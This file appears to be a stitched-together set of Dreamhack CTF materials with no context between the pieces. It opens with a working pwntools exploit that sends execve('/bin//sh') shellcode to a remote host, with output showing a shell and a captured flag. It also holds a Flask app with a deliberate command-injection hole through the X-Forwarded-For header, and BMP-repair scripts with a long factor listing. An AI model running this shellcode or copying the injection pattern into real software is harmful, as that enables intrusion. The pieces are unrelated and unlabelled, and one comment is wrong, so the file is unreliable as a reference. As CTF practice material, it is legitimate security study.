from pwn import *
#context.log_level = 'debug'
context(arch='amd64', os='linux')
warnings.filterwarnings('ignore')

p = process("./main")
p = remote("host3.dreamhack.games", 9532)

payload = b"\x31\xf6"   #xor    esi,esi

#payload += b"\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68"  #movabs rbx,0x68732f2f6e69622f

payload += b"\x68\x2F\x62\x69\x6E"  #push 0x6e69622f '/bin'    
payload += b"\x68\x2F\x2F\x73\x68"  #push 0x68732f2f '//sh'
payload += b"\x5B"  #pop rbx    #rbx=0x68732f2f
payload += b"\x48\xC1\xE3\x20"  #shl rbx, 32    #rbx=0x68732f2f00000000 (0x6e69622f << 32) 
payload += b"\x58"  #pop rax    #rax=0x6e69622f
payload += b"\x48\x09\xC3"  #or rbx, rax    #rbx=0x68732f2f6e69622f (rbx | rax), (0x68732f2f00000000 | 0x6e69622f)

payload += b"\x56"  #push rsi
payload += b"\x53"  #push rbx
payload += b"\x54"  #push rsp
payload += b"\x5f"  #push rdi
payload += b"\x6a\x3b"  #push 0x3b
payload += b"\x58"  #pop eax
payload += b"\x31\xd2"  #xor edx, edx
payload += b"\x0f\x05"  #syscall

p.sendafter("Give me your shellcode > ", payload)

p.interactive()

seo@seo:~/Documents/dreamhack/no_mov$ python3 solve.py
[+] Starting local process './main': pid 12373
[+] Opening connection to host3.dreamhack.games on port 9532: Done
[*] Switching to interactive mode
$ ls
flag
main
$ cat flag
DH{1809e85d58743e0c0758ae0795cd0c7092d7adf49d7cbe3d836b1a6a0676fee6}
$
[*] Interrupted
[*] Closed connection to host3.dreamhack.games port 9532
[*] Stopped process './main' (pid 12373)

global
    daemon
    maxconn 256

defaults
    mode http
    timeout connect 50000ms
    timeout client 50000ms
    timeout server 50000ms

listen http-in
    bind *:8000
    option forwardfor
    server app app:3000

#!/usr/bin/python3
import os
from subprocess import run, TimeoutExpired
from flask import Flask, request, render_template

app = Flask(__name__)
app.secret_key = os.urandom(64)


@app.route('/')
def flag():
    user_ip = request.access_route[0] if request.access_route else request.remote_addr
    try:
        result = run(
            ["/bin/bash", "-c", f"echo {user_ip}"],
            capture_output=True,
            text=True,
            timeout=3,
        )
        return render_template("ip.html", result=result.stdout)

    except TimeoutExpired:
        return render_template("ip.html", result="Timeout!")


app.run(host='0.0.0.0', port=3000)

with open('flag.bmp', 'rb') as f:
    data = bytearray(f.read())

data[:0x1C] = b'\x00' * 0x1C
data[0x22:0x36] = b'\x00' * 0x14

with open('flag.bmp.broken', 'wb') as f:
    f.write(data)

def find_multiplication_expression(number):
    expressions = []
    for i in range(1, number+1):
        if number % i == 0:
            expressions.append((i, number // i))
    return expressions

if __name__ == "__main__":
    biSizeImage = 4769856
    multiplication_expressions = find_multiplication_expression(biSizeImage)
    print(f"{biSizeImage}를 곱한 식들:")
    for expression in multiplication_expressions:
        print(f"{expression[0]} * {expression[1]}")

C:\Users\Seo Hyun-gyu\Downloads\2a248953-26de-4e3d-b23c-5193d9d2a653>python3 get_resolution_posibility.py
4769856를 곱한 식들:
1 * 4769856
2 * 2384928
3 * 1589952
4 * 1192464
6 * 794976
7 * 681408
8 * 596232
9 * 529984
12 * 397488
13 * 366912
14 * 340704
16 * 298116
18 * 264992
21 * 227136
24 * 198744
26 * 183456
28 * 170352
32 * 149058
36 * 132496
39 * 122304
42 * 113568
48 * 99372
49 * 97344
52 * 91728
56 * 85176
63 * 75712
64 * 74529
72 * 66248
78 * 61152
84 * 56784
91 * 52416
96 * 49686
98 * 48672
104 * 45864
112 * 42588
117 * 40768
126 * 37856
144 * 33124
147 * 32448
156 * 30576
168 * 28392
169 * 28224
182 * 26208
192 * 24843
196 * 24336
208 * 22932
224 * 21294
234 * 20384
252 * 18928
273 * 17472
288 * 16562
294 * 16224
312 * 15288
336 * 14196
338 * 14112
364 * 13104
392 * 12168
416 * 11466
441 * 10816
448 * 10647
468 * 10192
504 * 9464
507 * 9408
546 * 8736
576 * 8281
588 * 8112
624 * 7644
637 * 7488
672 * 7098
676 * 7056
728 * 6552
784 * 6084
819 * 5824
832 * 5733
882 * 5408
936 * 5096
1008 * 4732
1014 * 4704
1092 * 4368
1176 * 4056
1183 * 4032
1248 * 3822
1274 * 3744
1344 * 3549
1352 * 3528
1456 * 3276
1521 * 3136
1568 * 3042
1638 * 2912
1764 * 2704
1872 * 2548
1911 * 2496
2016 * 2366
2028 * 2352
2184 * 2184
2352 * 2028
2366 * 2016
2496 * 1911
2548 * 1872
2704 * 1764
2912 * 1638
3042 * 1568
3136 * 1521
3276 * 1456
3528 * 1352
3549 * 1344
3744 * 1274
3822 * 1248
4032 * 1183
4056 * 1176
4368 * 1092
4704 * 1014
4732 * 1008
5096 * 936
5408 * 882
5733 * 832
5824 * 819
6084 * 784
6552 * 728
7056 * 676
7098 * 672
7488 * 637
7644 * 624
8112 * 588
8281 * 576
8736 * 546
9408 * 507
9464 * 504
10192 * 468
10647 * 448
10816 * 441
11466 * 416
12168 * 392
13104 * 364
14112 * 338
14196 * 336
15288 * 312
16224 * 294
16562 * 288
17472 * 273
18928 * 252
20384 * 234
21294 * 224
22932 * 208
24336 * 196
24843 * 192
26208 * 182
28224 * 169
28392 * 168
30576 * 156
32448 * 147
33124 * 144
37856 * 126
40768 * 117
42588 * 112
45864 * 104
48672 * 98
49686 * 96
52416 * 91
56784 * 84
61152 * 78
66248 * 72
74529 * 64
75712 * 63
85176 * 56
91728 * 52
97344 * 49
99372 * 48
113568 * 42
122304 * 39
132496 * 36
149058 * 32
170352 * 28
183456 * 26
198744 * 24
227136 * 21
264992 * 18
298116 * 16
340704 * 14
366912 * 13
397488 * 12
529984 * 9
596232 * 8
681408 * 7
794976 * 6
1192464 * 4
1589952 * 3
2384928 * 2
4769856 * 1